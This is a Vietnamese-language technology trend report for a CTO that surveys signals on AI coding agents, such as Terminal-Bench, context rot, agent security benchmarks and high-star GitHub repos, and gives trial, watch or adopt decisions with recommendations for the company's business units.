Agentic SDLC: tín hiệu mạnh nhưng dữ liệu xã hội thiếu Reddit/Facebook

171 candidates quét; X=32, YouTube=20, HN/dev=30, GitHub=64, Papers/Product=25; Reddit=0 do 403, Facebook=0 do fallback không có link dùng được. Vì vậy không claim PASS.

1. Executive Snapshot

1) Context rot là blocker thật

Why now: HN có thread mới về codex /goal fail với 1 pts/0 comments trong 24h; thấp engagement nhưng đúng pain point harness. Quyết định: trial guardrail context snapshot.

2) Agent security benchmark nổi lên

AgentToolBench-Code xuất hiện 2026-05-26; metric 1 pts nhưng chủ đề security benchmark trực tiếp liên quan agent reliability.

3) Terminal-Bench tạo pressure OSS

Dirac đạt 393 pts/148 comments trên HN; ForgeCode gắn Terminal-Bench 2.0. Cần benchmark nội bộ 20 task.

4) Repo momentum phân mảnh

GitHub 64 signals; top sample: multica 33,146 stars/3,984 forks nhưng 753 issues → adoption cao, vận hành rủi ro.

5) Workflow automation gần business hơn model news

Kampala 100 pts/83 comments về reverse-engineer app→API; hợp NEXA/DOMUS hơn agent IDE thuần.

2. KPI Dashboard

YouTube

HN/dev_web

GitHub

Papers/Product

Facebook

Total

171

Blocker: Reddit 5 lần HTTP 403; Facebook public fallback 0 link; X dùng search fallback, direct unauthenticated unavailable.

3. KOL/OG Feed Watch

Nền tảng	Signal/link	Metric	Timestamp
HN	Why codex /goal fails on complex workflows	1 pts / 0 comments	2026-05-26T06:33Z
HN	Show HN: AgentToolBench-Code	1 pts / 0 comments	2026-05-26T03:45Z
HN	What ClickHouse learned from a year of coding with AI agents	2 pts / 0 comments	2026-05-25T17:36Z
HN	Ask HN: What do you do at work while the coding agent is working?	5 pts / 6 comments	2026-05-25T16:55Z
HN	Zero – Programming Language for Agents	3 pts / 0 comments	2026-05-23T11:13Z
HN	Launch HN: Kampala – Reverse-Engineer Apps into APIs	100 pts / 83 comments	2026-04-16T15:19Z
HN	Dirac topped TerminalBench on Gemini-3-flash-preview	393 pts / 148 comments	2026-04-27T12:35Z
GitHub	gadievron/raptor	2,755 stars / 435 forks / 17 issues	2026-05-26T07:33Z
GitHub	getpaseo/paseo	6,726 stars / 637 forks / 456 issues	2026-05-26T07:33Z
GitHub	multica-ai/multica	33,146 stars / 3,984 forks / 753 issues	2026-05-26T07:33Z
GitHub	codeaholicguy/ai-devkit	1,214 stars / 198 forks / 5 issues	2026-05-26T07:31Z
GitHub	MayDay-wpf/snow-cli	828 stars / 68 forks / 5 issues	2026-05-26T07:31Z
GitHub	RDI-Foundation/amber	HN 1 pts / 0 comments	2026-04-13T07:48Z
Product/Bench	ForgeCode Terminal-Bench 2.0	4 HN pts / benchmark claim	2026-04-29T18:16Z
Product	DAAF Claude Code research workflow	1 HN pts / 0 comments	2026-05-25T22:52Z

4. Trend Radar

Hot now

Terminal-Bench/SWE harness: 2 benchmark-linked signals, quyết định trial.

Emerging

Agent runtime/language: Zero, Amber, Salacia; N/A delta → watch.

Noise

Vibe-coded app showcases: 3+ HN items, low direct Fabbi ROI → ignore/monitor.

5. Repo Watch

Repo có adoption cao nhưng issue risk: multica 753 issues; paseo 456 issues; raptor 17 issues. Không adopt production khi chưa có maintainer/activity audit 7 ngày.

6. Paper / Benchmark Watch

Benchmark/product candidates=25. Ưu tiên Terminal-Bench + AgentToolBench-Code; papers cụ thể từ harness chưa expose đủ direct metadata trong run → DATA_HEALTH impact -15% confidence.

7. Product / Business Watch

Claude Code/Codex/Cursor/Devin/OpenCode/Copilot/Gemini CLI được theo dõi qua social/product fallback; direct product changelog links chưa đủ trong sample → dùng quyết định watch/trial có kiểm soát, không adopt rộng.

8. Impact Coverage

Domain	0-2w	1-2m	3-6m	Decision
FARE	Harness 20 task cho bugfix CRUD/API	Agent QA regression	Governed SDLC	trial
NEXA	App→API discovery từ Kampala pattern	Legacy integration copilots	Workflow mining	trial
DOMUS	Agent code review policy	Multi-agent backlog triage	SDLC telemetry	watch
Japan/Vietnam/Global	PoC nội bộ 2 tuần	JP enterprise security story	Reusable Fabbi accelerator	adopt gated

9. CTO Evaluation Matrix

Top signal	Luận điểm / why now	Bằng chứng	Phản tín hiệu / rủi ro	Fabbi implication	Decision	Conf.	Next validation 1-2w
Context rot	Agent dài phiên fail vì compaction/context	HN 1/0	Engagement thấp, anecdote	FARE/SYNCA: cần context contract	trial	62%	Đo pass@1 trên 20 tasks trước/sau snapshot
Security benchmark	Tool-use attack surface thành gating criterion	AgentToolBench-Code	Gist mới, chưa peer review	Japan/global: security narrative	trial	58%	5 malicious-tool tests trong CI
Terminal-Bench OSS	Benchmark tạo leaderboard pressure	393/148, ForgeCode	Leaderboard gaming; task mismatch	NEXA/DOMUS: internal task bench	adopt	70%	Build 20 Fabbi tasks, compare 3 agents
High-star repos	OSS adoption có tín hiệu nhưng maintenance risk	33,146 stars/753 issues	Stars ≠ production readiness	Global: watch, not vendor lock	watch	64%	Issue close velocity + release cadence 30d
App→API automation	Legacy modernization ROI gần business	100 pts/83 comments	YC launch hype, not OSS	NEXA/Japan: presales demo	trial	68%	1 legacy screen→API spec demo

10. CTO Recommendations

1) Dựng Fabbi Agent Bench v0

ROI/time-saving: 15-25%; risk 2/5; owner: Tech Lead AI SDLC; TTV: 10 ngày; validation: pass@1/pass@3 trên 20 tasks.

2) Context Contract cho coding agents

ROI/time-saving: 10-18%; risk 2/5; owner: Platform Eng; TTV: 7 ngày; validation: giảm retry ≥20% trên task dài.

3) Security mini-suite cho tool-use

ROI/time-saving: 8-12% avoided rework; risk 3/5; owner: AppSec + AI Champion; TTV: 14 ngày; validation: 5 malicious prompt/tool tests pass CI.

4) NEXA legacy app→API demo

ROI/time-saving: 20-30% discovery; risk 3/5; owner: Solution Architect; TTV: 2 tuần; validation: 1 JP-style legacy flow → API spec + test stub.

11. Source Appendix

Coverage: 171 scanned / cited 30 possible. Missing: Reddit 403, Facebook 0 usable public links. DATA_HEALTH_PARTIAL.

Nền tảng	Signal/link	Metric	Timestamp
HN	Why codex /goal fails on complex workflows	1 pts / 0 comments	2026-05-26T06:33Z
HN	Show HN: AgentToolBench-Code	1 pts / 0 comments	2026-05-26T03:45Z
HN	What ClickHouse learned from a year of coding with AI agents	2 pts / 0 comments	2026-05-25T17:36Z
HN	Ask HN: What do you do at work while the coding agent is working?	5 pts / 6 comments	2026-05-25T16:55Z
HN	Zero – Programming Language for Agents	3 pts / 0 comments	2026-05-23T11:13Z
HN	Launch HN: Kampala – Reverse-Engineer Apps into APIs	100 pts / 83 comments	2026-04-16T15:19Z
HN	Dirac topped TerminalBench on Gemini-3-flash-preview	393 pts / 148 comments	2026-04-27T12:35Z
GitHub	gadievron/raptor	2,755 stars / 435 forks / 17 issues	2026-05-26T07:33Z
GitHub	getpaseo/paseo	6,726 stars / 637 forks / 456 issues	2026-05-26T07:33Z
GitHub	multica-ai/multica	33,146 stars / 3,984 forks / 753 issues	2026-05-26T07:33Z
GitHub	codeaholicguy/ai-devkit	1,214 stars / 198 forks / 5 issues	2026-05-26T07:31Z
GitHub	MayDay-wpf/snow-cli	828 stars / 68 forks / 5 issues	2026-05-26T07:31Z
GitHub	RDI-Foundation/amber	HN 1 pts / 0 comments	2026-04-13T07:48Z
Product/Bench	ForgeCode Terminal-Bench 2.0	4 HN pts / benchmark claim	2026-04-29T18:16Z
Product	DAAF Claude Code research workflow	1 HN pts / 0 comments	2026-05-25T22:52Z